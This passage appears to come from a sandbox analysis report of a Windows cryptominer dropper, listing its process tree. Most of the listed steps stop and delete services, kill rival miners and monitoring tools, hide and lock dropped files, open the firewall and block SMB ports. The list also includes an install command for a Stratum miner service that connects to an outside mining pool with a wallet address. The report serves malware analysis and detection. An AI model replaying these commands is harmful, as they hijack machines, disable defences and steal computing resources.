- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop Hostserver2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Hostserver3⤵
-
C:\Windows\SysWOW64\sc.exesc delete Hostserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop ServiceMaims2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServiceMaims3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ServiceMaims2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop ServicesMain2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ServicesMain3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ServicesMain2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop FormManger2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FormManger3⤵
-
C:\Windows\SysWOW64\sc.exesc delete FormManger2⤵
-
C:\Windows\SysWOW64\net.exenet stop Famserver2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Famserver3⤵
-
C:\Windows\SysWOW64\net.exenet stop RpcEptManger2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RpcEptManger3⤵
-
C:\Windows\SysWOW64\sc.exesc delete Famserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete RpcEptManger2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop samserver2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop samserver3⤵
-
C:\Windows\SysWOW64\sc.exesc delete samserver2⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\net.exenet stop WinNsaSrv2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinNsaSrv3⤵
-
C:\Windows\SysWOW64\sc.exesc delete WinNsaSrv2⤵
- Launches sc.exe
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install HostManger c:\windows\Fonts\lsass.exe2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set HostManger Description HOST performance library information from Windows Management.2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set HostManger DisplayName HOST Endpoint Manger2⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start HostManger2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\hosts1.bat2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\SysWOW64\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\SysWOW64\rscheck.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\SysWOW64\checkrs.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\seser.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\seser.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\system32\\seser.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='seser.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\seser.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='rscheck.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\rscheck.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='checkrs.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\checkrs.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\vmicvess\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\ProgramData\vmicvess\svchost.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\vmicvess\svchost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\vmicvess\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\ProgramData\Microsoft\vmicvess\csrss.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\help\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='SPOOLSV.exe' and ExecutablePath='C:\\windows\\help\\SPOOLSV.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='services.exe' and ExecutablePath='C:\\windows\\fonts\\help\\services.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\fonts\help\services.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\fonts\\help\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\fonts\help\svchost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='conhost.exe' and ExecutablePath='C:\\windows\\temp\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\temp\conhost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='lsmose.exe' and ExecutablePath='C:\\Windows\\debug\\lsmose.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\debug\lsmose.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\debug\lsmose.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='spoolsv.exe' and ExecutablePath='C:\\Windows\\SpeechsTracing\\spoolsv.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='update.exe' and ExecutablePath='C:\\windows\\update.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='SRDSL.exe' and ExecutablePath='C:\\windows\\syswow64\\SRDSL.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='ClipBooks.exe' and ExecutablePath='C:\\windows\\syswow64\\ClipBooks.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='services.exe' and ExecutablePath='C:\\windows\\debug\\services.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\windows\debug\services.exe3⤵
- Sets file to hidden
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\debug\services.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\debug\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\windows\debug\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\debug\svchost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\vmicvess\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\syswow64\ClipBooks.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\syswow64\SRDSL.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='taskhost.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\taskhost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='services.exe' and ExecutablePath='C:\\WINDOWS\\Fonts\\services.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\WINDOWS\Fonts\taskhost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\WINDOWS\Fonts\services.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\hosts.bat2⤵
-
C:\Windows\SysWOW64\sc.exesc stop COMSysCts3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete COMSysCts3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop WmSrv3⤵
-
C:\Windows\SysWOW64\sc.exesc delete WmSrv3⤵
-
C:\Windows\SysWOW64\sc.exesc stop WmiAppSrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop "RegCsv COMSysApp"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "RegCsv COMSysApp"3⤵
-
C:\Windows\SysWOW64\sc.exesc stop hasplms3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete hasplms3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop hasp1ms3⤵
-
C:\Windows\SysWOW64\sc.exesc delete hasp1ms3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop serviceing3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete serviceing3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop SQLWriter$3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete SQLWriter$3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop IPSECS3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete IPSECS3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftFonts3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftFonts3⤵
-
C:\Windows\SysWOW64\sc.exesc stop Microsoft_Update3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Microsoft_Update3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop "Help Service"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Help Service"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop vmicvess3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete vmicvess3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop SSDPSRVS3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete SSDPSRVS3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop superproservert3⤵
-
C:\Windows\SysWOW64\sc.exesc delete superproservert3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop Bcdefg3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Bcdefg3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop ctfnom3⤵
-
C:\Windows\SysWOW64\sc.exesc delete ctfnom3⤵
-
C:\Windows\SysWOW64\sc.exesc stop ClipBooks3⤵
-
C:\Windows\SysWOW64\net.exenet stop "MicrosoftFonts"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MicrosoftFonts"4⤵
-
C:\Windows\SysWOW64\net.exenet stop MicrosoftFonts3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MicrosoftFonts4⤵
-
C:\Windows\SysWOW64\net.exenet stop "Framework"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Framework"4⤵
-
C:\Windows\SysWOW64\net.exenet stop Servicing3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Servicing4⤵
-
C:\Windows\SysWOW64\sc.exesc stop cefragsvc3⤵
-
C:\Windows\SysWOW64\sc.exesc delete cefragsvc3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop Microsoft.NET_Framework_NGEN3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Microsoft.NET_Framework_NGEN3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop natiodnal3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete natiodnal3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop wbzxqk3⤵
-
C:\Windows\SysWOW64\sc.exesc delete wbzxqk3⤵
-
C:\Windows\SysWOW64\sc.exesc stop hidserv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete hidserv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop NetASDlogon3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete NetASDlogon3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop "BITS lsm"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "BITS lsm"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop endpointrpc3⤵
-
C:\Windows\SysWOW64\sc.exesc delete endpointrpc3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop "MYSQL Input Service Name"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete "MYSQL Input Service Name"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete csrss3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop csrss3⤵
-
C:\Windows\SysWOW64\sc.exesc stop gupdate3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete gupdate3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop gupdatem3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete gupdatem3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop wmiApSrvs3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete wmiApSrvs3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop snmpstorsrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete snmpstorsrv3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "MicrosoftFonts"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop serviceing3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete Servicing3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftFonts3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc stop WmiAppSrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im runhost.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im rundllhost.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dlllhost.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\WmiAppSrv\svchost.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData\Microsoft\WmiAppSrv\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSrv\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system\lsmsm.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\mysql.log /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system\lsaus.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\srvany.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\splwow64.exe /d everyone3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\svchost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im tasksche.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\tasksche.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\tasksche.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\help\csrss.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\help\www.exe /p everyone:n /d system3⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= auto3⤵
-
C:\Windows\SysWOW64\net.exenet start MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start MpsSvc4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=win3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Allowlist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=denylist3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1353⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1373⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1383⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=1393⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=4453⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=Allow action=permit3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=deny action=block3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=win assign=y3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "3⤵
-
C:\Windows\SysWOW64\find.exefind "5.1."3⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
- Deletes itself
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\lsass.exe"c:\windows\Fonts\lsass.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start Hostserver3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Hostserver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Hostserver Security Accounts Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install Hostserver KvMonXP.exe -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start Hostserver3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Hostserver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set Hostserver Security Accounts Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install Hostserver KvMonXP.exe -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
